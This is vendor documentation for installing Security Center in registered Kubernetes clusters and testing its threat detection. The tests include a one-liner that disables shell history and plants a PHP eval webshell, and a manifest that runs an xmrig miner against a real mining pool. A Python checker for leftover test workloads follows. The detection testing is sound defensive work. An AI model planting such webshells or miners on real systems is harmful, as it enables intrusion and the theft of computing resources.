Security Center is a centralized security management system that dynamically identifies and analyzes security threats, and generates alerts when threats are detected. Security Center provides multiple features to ensure the security of cloud resources and servers in data centers. The features include anti-ransomware, antivirus, web tamper proofing, container image scan, and compliance check. This allows you to automate threat detection, alerting, and threat tracing, and meet regulatory compliance requirements. This topic describes how to install and use Security Center in registered clusters.
Prerequisites
A cluster registration proxy is created and an external Kubernetes cluster is connected to the cluster registration proxy. For more information, see Create a registered cluster.
Security Center is activated. For more information, see Purchase Security Center.
A kubectl client is connected to the cluster. For more information, see Obtain the kubeconfig file of a cluster and use kubectl to connect to the cluster.
Background information
Security Center generates alerts for detected threats in real time. Security Center allows you to identify vulnerabilities, perform baseline checks, and check configurations of your cloud services. This helps you reinforce system security and prevent attacks. Security Center can analyze the security situation of your assets and provides a graphical user interface that allows you to trace and analyze security events. This helps you build a high-performance security system for your assets. The assets include Elastic Compute Service (ECS) instances, servers that are deployed on hybrid clouds, containers, and cloud services.
Step 1: Install Security Center
Log on to the ACK console. In the left-side navigation pane, choose .
On the Marketplace page, click the App Catalog tab. Find and click ack-aegis-installer.
On the ack-aegis-installer page, click Deploy.
On the Basic Information wizard page, select a cluster and a namespace, and then click Next.
Specify parameters related to the ack-aegis-installer component.
Log on to the Security Center console. In the left-side navigation pane, click .
On the Feature Settings page, click the Agent tab and then click the Client Installation Command tab to obtain the install_key.

On the Parameters wizard page, configure the parameters and click OK.
Important: If you do not specify the install_key parameter or the value of the parameter is invalid, the system fails to install Security Center.
| Parameter | Description | Default |
| --- | --- | --- |
| controller.cluster_id | The ID of the cluster. | The ID of the selected cluster, which is automatically specified. |
| controller.cluster_name | The name of the cluster. | The name of the selected cluster, which is automatically specified. |
| limit_cpu | The maximum CPU utilization. | 200m |
| limit_memory | The maximum memory usage. | 128Mi |
| imagePullPolicy | The policy used to pull images. | Always |
| install_key | The key that is required to install the Security Center component. | By default, this parameter is left empty. You must specify this parameter with the install_key that you previously obtained. |
Step 2: Use Security Center
The following examples describe how to use Security Center in a registered cluster.
Example 1: Run suspicious commands in a pod
Create a file named ubuntu.yaml with the following content:
apiVersion: v1
kind: Pod
metadata:
  name: ubuntu
  labels:
    app: ubuntu
spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    command: ["/bin/sleep", "3650d"]
    imagePullPolicy: IfNotPresent
  restartPolicy: Always
Run the following command to deploy the pod named ubuntu:
kubectl apply -f ubuntu.yaml
Run the following command to anonymously inject a suspicious webshell file into the pod that is deployed:
bash -c "unset HISTFILE && echo '<?php @eval(\$_POST['x']); ?>' >shell.php"
Log on to the Security Center console and view the threat detection result.
For more information, see View and handle alerts.
Example 2: Deploy a mining container in a registered cluster
The test image used in this example is built based on the xmrig image that is used for crypto mining. The image is used to simulate mining attacks.
Import the miner_image_xmrig.tar image to the test node.
Create a file named miner-test.yaml with the following content:
apiVersion: apps/v1 # for versions before 1.8.0 use apps/v1beta1
kind: Deployment
metadata:
  name: miner-test
  labels:
    app: miner-test
spec:
  replicas: 1
  selector:
    matchLabels:
      app: miner-test
  template:
    metadata:
      labels:
        app: miner-test
    spec:
      containers:
      - name: miner-test
        image: xxxxx # The image address.
        args: ["-o xmr-eu2.nanopool.org:14444 -u AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -p worker -a rx/0"]
Run the following command to start the mining container:
kubectl apply -f miner-test.yaml
Log on to the Security Center console and view the threat detection result.
For more information, see View and handle alerts.
Run the following command to stop and delete the Deployment.
Important: You must delete the Deployment after the test is complete.
kubectl delete Deployment miner-test
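A cleanup check for the two tests above, as an added example that is not part of the original documentation: it scans a workload listing for objects that still carry the test labels from ubuntu.yaml and miner-test.yaml, or whose container arguments look like the miner arguments in miner-test.yaml. The function names, the argument heuristic, and the sample objects are assumptions made for this example.

```python
import re

# App labels taken from the two test manifests on this page.
TEST_APPS = {"ubuntu", "miner-test"}
# Assumed heuristic (not a Security Center rule): xmrig-style arguments as in
# miner-test.yaml, a pool passed as "-o host:port" together with "-u <wallet>".
POOL_ARG = re.compile(r"(?:^|\s)-o\s+[\w.-]+:\d+")
USER_ARG = re.compile(r"(?:^|\s)-u\s+\S+")

def containers_of(item):
    """Return the container list of a Pod or Deployment object."""
    spec = item.get("spec", {})
    if item.get("kind") == "Deployment":
        spec = spec.get("template", {}).get("spec", {})
    return spec.get("containers", [])

def find_leftovers(listing):
    """Return (kind, namespace/name, reason) for each leftover test workload."""
    findings = []
    for item in listing.get("items", []):
        meta = item.get("metadata", {})
        ref = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
        if (meta.get("labels") or {}).get("app") in TEST_APPS:
            findings.append((item.get("kind"), ref, "test label"))
        for c in containers_of(item):
            argline = " ".join(c.get("command", []) + c.get("args", []))
            if POOL_ARG.search(argline) and USER_ARG.search(argline):
                findings.append((item.get("kind"), ref, "miner arguments"))
    return findings

def obj(kind, ns, name, app, containers):
    """Build a minimal object; Deployments nest the pod spec under template."""
    spec = {"containers": containers}
    if kind == "Deployment":
        spec = {"template": {"spec": spec}}
    return {"kind": kind, "spec": spec,
            "metadata": {"namespace": ns, "name": name, "labels": {"app": app}}}

# Constructed sample shaped like `kubectl get deployments,pods -A -o json`.
SAMPLE = {"kind": "List", "items": [
    obj("Pod", "default", "ubuntu", "ubuntu", [{"command": ["/bin/sleep", "3650d"]}]),
    obj("Pod", "prod", "web", "web", [{"args": ["-g", "daemon off;"]}]),
    obj("Deployment", "dev", "batch", "batch",
        [{"args": ["-o pool.example.invalid:3333 -u WALLET_PLACEHOLDER -a rx/0"]}]),
]}

if __name__ == "__main__":
    for finding in find_leftovers(SAMPLE):
        print(*finding)
```

Against a real cluster, pass the parsed JSON output of `kubectl get deployments,pods --all-namespaces -o json` to find_leftovers; an empty result means neither test workload remains.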